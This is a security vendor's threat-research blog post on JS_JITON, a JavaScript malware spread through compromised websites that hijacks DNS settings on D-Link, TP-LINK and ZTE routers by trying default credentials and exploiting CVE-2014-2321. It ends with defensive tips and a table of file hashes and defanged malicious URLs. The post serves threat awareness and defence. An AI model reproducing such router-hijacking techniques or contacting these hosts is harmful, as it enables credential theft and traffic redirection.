Attacks against home routers have been going around for years—from malware that rigs routers to DNS rebinding attacks and backdoors, among others. Just last year one of our researchers reported a Domain Name System (DNS) changer malware that redirected users to malicious pages when they visited specific websites. This enabled cyber crooks to get hold of the victims’ online credentials, such as passwords and PINs.
We recently came across an attack that proves how the Internet of Things (IoT) can be an entry point for cybercriminal activities. In this attack, which has been going on since December 2015, it requires users to access malicious websites hosting the JavaScript via their mobile devices. Accessing these sites via mobile devices enable the JavaScript to download another JavaScript with DNS changing routines.
Detected as JS_JITON, this JavaScript can be downloaded whether users are accessing compromised websites via their computers or mobile devices. However, the infection chain differs depending on the medium employed by users. For instance, JS_JITON downloads JS_JITONDNS that only infects mobile devices and triggers the DNS changing routine. JITON only exploits the vulnerability if the affected users have ZTE modems.
Figure 1. The number of detection for JS_JITON (Jan 5, 2016 – April 4 2016)
Figure 2: Malicious obfuscated JavaScript hosted in the legitimate websites
Looking through the codes, we found mentions of well-known router manufacturers: D-Link, TP-LINK, and ZTE. TP-LINK accounts for 28% of router sales, making it the top router manufacturerfor Q1 2015. D-Link is also included in the top 10 with its 7% market share. Given that these have significant market share globally, it’s no surprise that cybercriminals appear to target these brands.
Although the attack employed compromised websites in certain countries in Asia and in Russia, it affected various countries globally. Based on our Smart Protection Network data, the top countries affected are Taiwan, Japan, China, the United States, and France. Router makers D-Link and TP-Link are Taiwanese and Chinese brands respectively and thus can be the attributing factor for the high percentage of affected users.
Figure 3: Top 10 countries affected by JS_JITON in the past 3 months
Cybercriminals behind this incident employ evasive mechanism to go off the radar and continue its attack without rousing any suspicion from affected users. Such tactics include regularly updating the JavaScript codes to fix errors and constantly changing targeted home routers. The compromised websites are difficult to pinpoint due to the lack of any suspicious behavior. We also observed during the course of our investigation that it has a keylogging function that allows this threat to gather typed contents in the specific sites. However, as of this writing, this function has been already removed.
Digging through the code
These malicious JavaScripts contain more than 1,400 combinations of login information. Using these lists of commonly used passwords, the DNS setting of the home routers can be overwritten. Most of the lists, however, have been commented out, meaning it doesn’t work properly. As such, the affected routers may be limited. There are codes within certain scripts that can overwrite DNS settings via the CVE-2014-2321 vulnerability that exists in ZTE. When successfully exploited, attackers can remotely send any arbitrary commands with admin privileges.
It should be noted that these DNS settings can be overwritten only when users access the compromised websites through their mobile devices. Aside from this, the codes are commented out and don’t run properly when executed. While we do not know exactly the motivation behind the addition of such features in the first place, but we can surmise that this is due to the proliferation and increase use of mobile devices. There’s also the possibility that these features are being used for testing purposes since these scripts are updated regularly.
Figure 4: The list of log-in IDs and passwords
Figure 5: Part of the scripts that modify the DNS settings via CVE-2014-2321 vulnerability
Awareness is key in the age of digitalization
Threats against home routers will likely proliferate, especially in the age of digitalization of devices. Although IoT has benefits, it also introduces security and privacy-related risks to users of home routers. In this case, we saw how attackers leveraged security gaps that may lead to information theft.
Users can arm themselves against such risks by doing the following security measures:
- Keep the firmware such as routers up-to-date with the latest patches
- Avoid using default IDs and passwords
Often times, people overlook the importance of keeping the firmware updated. Administrative devices especially in the age of IoT are vulnerable to attacks that may pose risks to both user privacy and security. It is best to know how these smart devices operate and what kind of personal identifiable information these devices may collect Knowing how secure smart devices are and the types of security risks using these may entail are some of the means in protecting yourself and your data against threats like JITON.
Trend Micro endpoint solutions such as Trend Micro Security, Smart Protection Suites, and Worry-Free Business Security can protect users and businesses from this threat by blocking all related malicious URLs and detecting the malicious files. Trend Micro Mobile Security Personal Editionand Mobile Security Solutions also block all related malicious URLs used in this attack.
Indicators of Compromise
| Type | Indicator |
| JS_JITON SHA1 | 4b75a94613b7bf238948104092fe9fd4107fbf97 |
| JS_JITON SHA1 | da19d2b503932bfb7b0ccf6c40b9f0b0d19282fb |
| JS_JITON SHA1 | f7d9dbc1c198de25512cb15f3c19827a2b2188df |
| JS_JITON SHA1 | 545c71b9988d6df27eae31e8738f28da7caae534 |
| JS_JITON SHA1 | 67c28c29ebef9a57657e84dce83d458225447ae9 |
| JS_JITON SHA1 | 1f6e45204a28d9da16777d772eddf7e8d10e588a |
| JS_JITON SHA1 | 331441f69ceae4d9f3a78f4b4b46bdc64c11bd4a |
| JS_JITON SHA1 | 2f48f1c75f0984d722395b47cd10af9c15ea142f |
| JS_JITON SHA1 | b6c423ff0c91fa65b63a37a136ca6bbe29fce34d |
| JS_JITON SHA1 | 9d37dcf8f87479545adf78d44ca97464491fe39a |
| JS_JITON SHA1 | af3ececf550f9486d90fca6f7bb7c735318d50cd |
| JS_JITON SHA1 | ce034e437b20dce84e75a90ed2b3a58532ebcbb9 |
| JS_JITON SHA1 | acb1f8caa3d2babe37ea21014e0c79ce6c18f8a2 |
| JS_JITON SHA1 | b62ea64db9643fe0a4331f724d234e19c149cabf |
| Malicious website | hxxp://lib[.]tongjii[.]us/tj[.]js |
| Malicious website | hxxp://lib[.]tongjii[.]us/tongji[.]js |
| Malicious website | hxxp://cn[.]tongjii[.]us/show[.]js |
| Malicious website | hxxp://cn[.]tongjii[.]us/show1[.]js |
| Malicious website | hxxp://dns[.]tongjj[.]info/dns/dlink[.]js |
| Malicious website | hxxp://dns[.]tongjj[.]info/dns/tplink[.]js |
| Malicious website | hxxp://dns[.]tongjj[.]info/dns/zte[.]js |
| Malicious website | hxxp://dns[.]tongjj[.]info/dns/china/dlink[.]js |
| Malicious website | hxxp://dns[.]tongjj[.]info/dns/china/tplink[.]js |
| Malicious website | hxxp://dns[.]tongjj[.]info/dns/china/zte[.]js |
Source:https://blog.trendmicro.com/
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held a cyber security researcher positions within a variety of cyber security start-ups. She also experience in different industry domains like finance, healthcare and consumer products.
